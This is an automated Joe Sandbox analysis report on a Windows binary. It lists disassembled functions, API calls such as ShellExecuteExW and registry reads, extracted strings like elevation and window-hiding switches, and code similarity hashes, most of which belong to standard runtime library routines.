                                                                  control_flow_graph 495 b570bb-b570c6 496 b570d4-b570da 495->496 497 b570c8-b570d2 495->497 499 b570f3-b57104 RtlAllocateHeap 496->499 500 b570dc-b570dd 496->500 497->496 498 b57108-b57113 call b47370 497->498 504 b57115-b57117 498->504 502 b57106 499->502 503 b570df-b570e6 call b55245 499->503 500->499 502->504 503->498 508 b570e8-b570f1 call b5bf83 503->508 508->498 508->499
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B5596A,00000001,00000364,?,00000006,000000FF,?,00B46CE7,00000000,00B53841,00000000), ref: 00B570FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 07a2c646254de83255044a0a614818ff0d189400e31e200e4e394365ec88426e
                                                                  • Instruction ID: ff6253fdee2c172de91dd24a12f7fb737a9ee7f66b378b560fcd2cca8ac3e6b3
                                                                  • Opcode Fuzzy Hash: 07a2c646254de83255044a0a614818ff0d189400e31e200e4e394365ec88426e
                                                                  • Instruction Fuzzy Hash: 0AF0B4313CC62067AB225A22AC02F5A77D9EF51773B1840E1BC14EB1D0CE60EC0886E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B55BDC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 511 b55bdc-b55be8 512 b55c1a-b55c25 call b47370 511->512 513 b55bea-b55bec 511->513 520 b55c27-b55c29 512->520 515 b55c05-b55c16 RtlAllocateHeap 513->515 516 b55bee-b55bef 513->516 517 b55bf1-b55bf8 call b55245 515->517 518 b55c18 515->518 516->515 517->512 523 b55bfa-b55c03 call b5bf83 517->523 518->520 523->512 523->515
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00B53841,?,00B5543A,?,00000000,?,00B46CE7,00000000,00B53841,00000000,?,?,?,00B5363B), ref: 00B55C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 78b2e39736c2263c835a0162f428565810c4b08bfd21c4c2d5b68cc9d42a7bb6
                                                                  • Instruction ID: 0e9a5d33f85fe8fb6b7d02200ea28f08ca0dbd8732d724b07a82e443064880b4
                                                                  • Opcode Fuzzy Hash: 78b2e39736c2263c835a0162f428565810c4b08bfd21c4c2d5b68cc9d42a7bb6
                                                                  • Instruction Fuzzy Hash: D4E0ED31204B21ABD6322A699D21B9A37CCEF113A3F0101E0FC96962E0CF60CC4886F9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B29910 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 526 b29910-b2998c call b30df9 call b28040 call b29730 532 b29991-b2999e 526->532 533 b299a0-b299ab 532->533 534 b299c5-b299f2 call b42937 532->534 535 b299ba-b299bc 533->535 536 b299ad-b299b8 533->536 535->534 539 b299be-b299bf LocalFree 535->539 536->535 538 b299f5-b29a87 call b47027 536->538 543 b29a89-b29a8d 538->543 544 b29a8f-b29a95 538->544 539->534 545 b29a99-b29a9e 543->545 544->545 546 b29aa0-b29aac 545->546 547 b29ae0-b29aea call b21bd0 546->547 548 b29aae-b29ac6 546->548 552 b29aef-b29b15 call b51144 547->552 549 b29ad8-b29ade 548->549 550 b29ac8-b29ad5 548->550 549->552 550->549 555 b29b17-b29b19 552->555 556 b29b1b-b29b22 552->556 555->546 557 b29b24-b29b2a 556->557 558 b29b2c-b29b2f 556->558 559 b29b32-b29b43 557->559 558->559 560 b29b94-b29bcb call b22e60 call b42937 559->560 561 b29b45-b29b4a 559->561 562 b29b89 561->562 563 b29b4c-b29b52 561->563 567 b29b8d-b29b92 562->567 565 b29b71-b29b79 563->565 566 b29b54-b29b5b 563->566 571 b29b7c-b29b87 565->571 566->565 569 b29b5d-b29b6f 566->569 567->560 567->561 569->571 571->562 571->567
                                                                  APIs
                                                                    • Part of subcall function 00B30DF9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B30E11
                                                                    • Part of subcall function 00B29730: std::locale::_Init.LIBCPMT ref: 00B29763
                                                                    • Part of subcall function 00B29730: std::_Lockit::_Lockit.LIBCPMT ref: 00B2978A
                                                                    • Part of subcall function 00B29730: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B297F0
                                                                  • LocalFree.KERNEL32(00000000,00000000,?,00B754B1,00000000), ref: 00B299BF
                                                                  • __cftoe.LIBCMT ref: 00B29B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_std::locale::_$FreeInitLocalLocimpLocimp::_Locinfo::_Locinfo_ctorLockitLockit::___cftoe
                                                                  • String ID:
                                                                  • API String ID: 810108568-0
                                                                  • Opcode ID: 6958a31143949c3ff4ce1952d3402aa3c2a3b40a62296c3d7ab2b942b2aa588e
                                                                  • Instruction ID: bc778758634bc40b5ecf0bde2408fff857f6940eb1cf9b9981162a5385fa88b4
                                                                  • Opcode Fuzzy Hash: 6958a31143949c3ff4ce1952d3402aa3c2a3b40a62296c3d7ab2b942b2aa588e
                                                                  • Instruction Fuzzy Hash: C92180709002599FEB14DF94C955BEEFBF5EB08720F10426DE419A73C0DBB95A84CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B26330 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 574 b26330-b2633c LocalAlloc
                                                                  APIs
                                                                  • LocalAlloc.KERNELBASE(00000040,?,00B30E04,00000020,?,?,00B29942,00000000,823FDEC6,?,?,?,?,00B650DD,000000FF), ref: 00B26336
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AllocLocal
                                                                  • String ID:
                                                                  • API String ID: 3494564517-0
                                                                  • Opcode ID: c86b6e40346bd0614dafc6e1834dc04edd64e452904f6e4d692f5d369c1bdde7
                                                                  • Instruction ID: ad87681ad463e17816048e3d0472ac8989a0792c34918662b6096493def4a57b
                                                                  • Opcode Fuzzy Hash: c86b6e40346bd0614dafc6e1834dc04edd64e452904f6e4d692f5d369c1bdde7
                                                                  • Instruction Fuzzy Hash: 46A002759A8200ABDE415B909E0BF097A61BB85B05F104C45F3596A0E08EB94420EB16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00B252F0 Relevance: 52.9, APIs: 14, Strings: 16, Instructions: 402libraryloadersleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00B2549C
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00B2551D
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00B25601
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00B25637
                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00B2567C
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B25685
                                                                  • AllowSetForegroundWindow.USER32(00000000), ref: 00B2568B
                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00B256AB
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B256AE
                                                                  • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00B256CA
                                                                  • EnumWindows.USER32(00B25830,?), ref: 00B256DF
                                                                  • BringWindowToTop.USER32(00000000), ref: 00B256F4
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00B25711
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00B2571B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                  • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                  • API String ID: 697762045-2796270252
                                                                  • Opcode ID: 4fe906d094fb4dafd6623d07e06de429b58e1ef8941c6fc6b12d255e73cf134c
                                                                  • Instruction ID: 62e3d9985f0067a5b926cdf8f4dd186f9bf71d52f1728aebb70b371aef2adc6a
                                                                  • Opcode Fuzzy Hash: 4fe906d094fb4dafd6623d07e06de429b58e1ef8941c6fc6b12d255e73cf134c
                                                                  • Instruction Fuzzy Hash: F6E1E231E00A199BCF20DFA8D844BAEB7F1EF48710F5481A9E819EB391DB749D40CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2C870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00B2CBB6
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00B7E6D0,00000800), ref: 00B2CBD3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: OpenQueryValue
                                                                  • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                  • API String ID: 4153817207-482544602
                                                                  • Opcode ID: e0c8e822276e5b55ee606fcef091c28cfdb76058440b6391a7a68a0c783b119b
                                                                  • Instruction ID: 6ab823c6648e98d272d1d1d04d040f9d9b1f7583f7cd0436aa16392d4506487b
                                                                  • Opcode Fuzzy Hash: e0c8e822276e5b55ee606fcef091c28cfdb76058440b6391a7a68a0c783b119b
                                                                  • Instruction Fuzzy Hash: F9C1D4359042368ACB359F14E84137E7BE1EFA5740F5884DAE88E9B295EB70CD82C7D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5DE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00B542D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B5DEE5
                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00B542D9,?,?,?,00000055,?,-00000050,?,?), ref: 00B5DF10
                                                                  • _wcschr.LIBVCRUNTIME ref: 00B5DFA4
                                                                  • _wcschr.LIBVCRUNTIME ref: 00B5DFB2
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00B5E073
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                  • String ID: utf8
                                                                  • API String ID: 4147378913-905460609
                                                                  • Opcode ID: c070fefbb13b8ee8ba3f687afb59a66be5acaffb63bba77b96a799b268899c3b
                                                                  • Instruction ID: a860b851e1b711e7385b09f99ae50da645d4041f2798c3b66973ef1adabd9fde
                                                                  • Opcode Fuzzy Hash: c070fefbb13b8ee8ba3f687afb59a66be5acaffb63bba77b96a799b268899c3b
                                                                  • Instruction Fuzzy Hash: B471C471600306AADB39AB348C87BBA73E8EF14702F1445E9FD159B1C1EBB4EE488751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  • Opcode ID: 1dd449ffb8e26778dcd53060725540d918cebb5a9114ff3b10cbefc684548092
                                                                  • Instruction ID: 7fef715ecda9054f19ca54ea3934c8d279daca03387176cd92de58853c577ce6
                                                                  • Opcode Fuzzy Hash: 1dd449ffb8e26778dcd53060725540d918cebb5a9114ff3b10cbefc684548092
                                                                  • Instruction Fuzzy Hash: 63D23971E086298FDB65DE28DD807EAB7F5EB44305F1441EAD80DE7240EB78AE858F41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00B5E8D1,00000002,00000000,?,?,?,00B5E8D1,?,00000000), ref: 00B5E64C
                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00B5E8D1,00000002,00000000,?,?,?,00B5E8D1,?,00000000), ref: 00B5E675
                                                                  • GetACP.KERNEL32(?,?,00B5E8D1,?,00000000), ref: 00B5E68A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP
                                                                  • API String ID: 2299586839-711371036
                                                                  • Opcode ID: d7241b59daac4790a8686b0a60c0a3d1eebc07dc344527b921d2f5741b9fcbeb
                                                                  • Instruction ID: 2ecbc69c3a6efbbad8ef13a805804d09594141611a56b0cb2618512fe160f73f
                                                                  • Opcode Fuzzy Hash: d7241b59daac4790a8686b0a60c0a3d1eebc07dc344527b921d2f5741b9fcbeb
                                                                  • Instruction Fuzzy Hash: F1217172640101AADB38CF14C904B9777E6EB74BA6B5684E4ED2ADB110FB32EF49C750
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B29CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: _swprintf$FreeLocal
                                                                  • String ID:
                                                                  • API String ID: 2429749586-0
                                                                  • Opcode ID: 95ea8dbefdf208e31f8dd0cf246a3f0df6bf4b2d65825613c2dda17177032e36
                                                                  • Instruction ID: f11709a5b5df01ee8dddea67e4744940ba2ffce5a4b134e1c2bc57dfddee02f1
                                                                  • Opcode Fuzzy Hash: 95ea8dbefdf208e31f8dd0cf246a3f0df6bf4b2d65825613c2dda17177032e36
                                                                  • Instruction Fuzzy Hash: 5CF1AC71D10229ABDF15DFA8EC40BAEBBF5FF48300F144269F919A7280DB35A941CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B5E788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B557CC: GetLastError.KERNEL32(?,00000008,00B5AD4C), ref: 00B557D0
                                                                    • Part of subcall function 00B557CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B55872
                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B5E894
                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00B5E8DD
                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00B5E8EC
                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B5E934
                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B5E953
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                  • String ID:
                                                                  • API String ID: 415426439-0
                                                                  • Opcode ID: 1bfc11905707de4939be49e8177ea1428f565b7699ed94c73516309f3b851beb
                                                                  • Instruction ID: 7b309aefad8879411310ee50af81caccfed3c5905e718b474490a96e96b4eec8
                                                                  • Opcode Fuzzy Hash: 1bfc11905707de4939be49e8177ea1428f565b7699ed94c73516309f3b851beb
                                                                  • Instruction Fuzzy Hash: 34515F71A00215AAEB24DFA5DC45BBA77F8EF49702F1445E9ED20E7190DBB0DA08CB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B55D6D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: _strrchr
                                                                  • String ID:
                                                                  • API String ID: 3213747228-0
                                                                  • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                  • Instruction ID: 626be23fea60b724d109ca2c7b9e4fa6cfb0927e18029eb1ec18e6a42a16728e
                                                                  • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                  • Instruction Fuzzy Hash: F7B14A729046459FDB25CF68C8D1BEEBBF5EF55312F1881E9EC05AB281D2349D09CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B433A8 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B433B4
                                                                  • IsDebuggerPresent.KERNEL32 ref: 00B43480
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B434A0
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00B434AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: 13cd6717b269352986f107f8b3dd1341d2710f158d4bd7b7e05981cf7c02abf5
                                                                  • Instruction ID: 11cbaddd33998cdb1279d414a49c32a18a04c5cd2d02c88fa64a5fd9be39dfd8
                                                                  • Opcode Fuzzy Hash: 13cd6717b269352986f107f8b3dd1341d2710f158d4bd7b7e05981cf7c02abf5
                                                                  • Instruction Fuzzy Hash: EC314975D452189BDF10EFA0D989BCCBBF8AF08704F1040EAE50CAB290EB759B859F44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00B2D0A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00B2C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,823FDEC6,?,00B63D30,000000FF), ref: 00B2C657
                                                                    • Part of subcall function 00B2C630: GetLastError.KERNEL32(?,00000000,00000000,823FDEC6,?,00B63D30,000000FF), ref: 00B2C661
                                                                  • IsDebuggerPresent.KERNEL32(?,?,00B78AF0), ref: 00B2D0D8
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B78AF0), ref: 00B2D0E7
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B2D0E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 3511171328-631824599
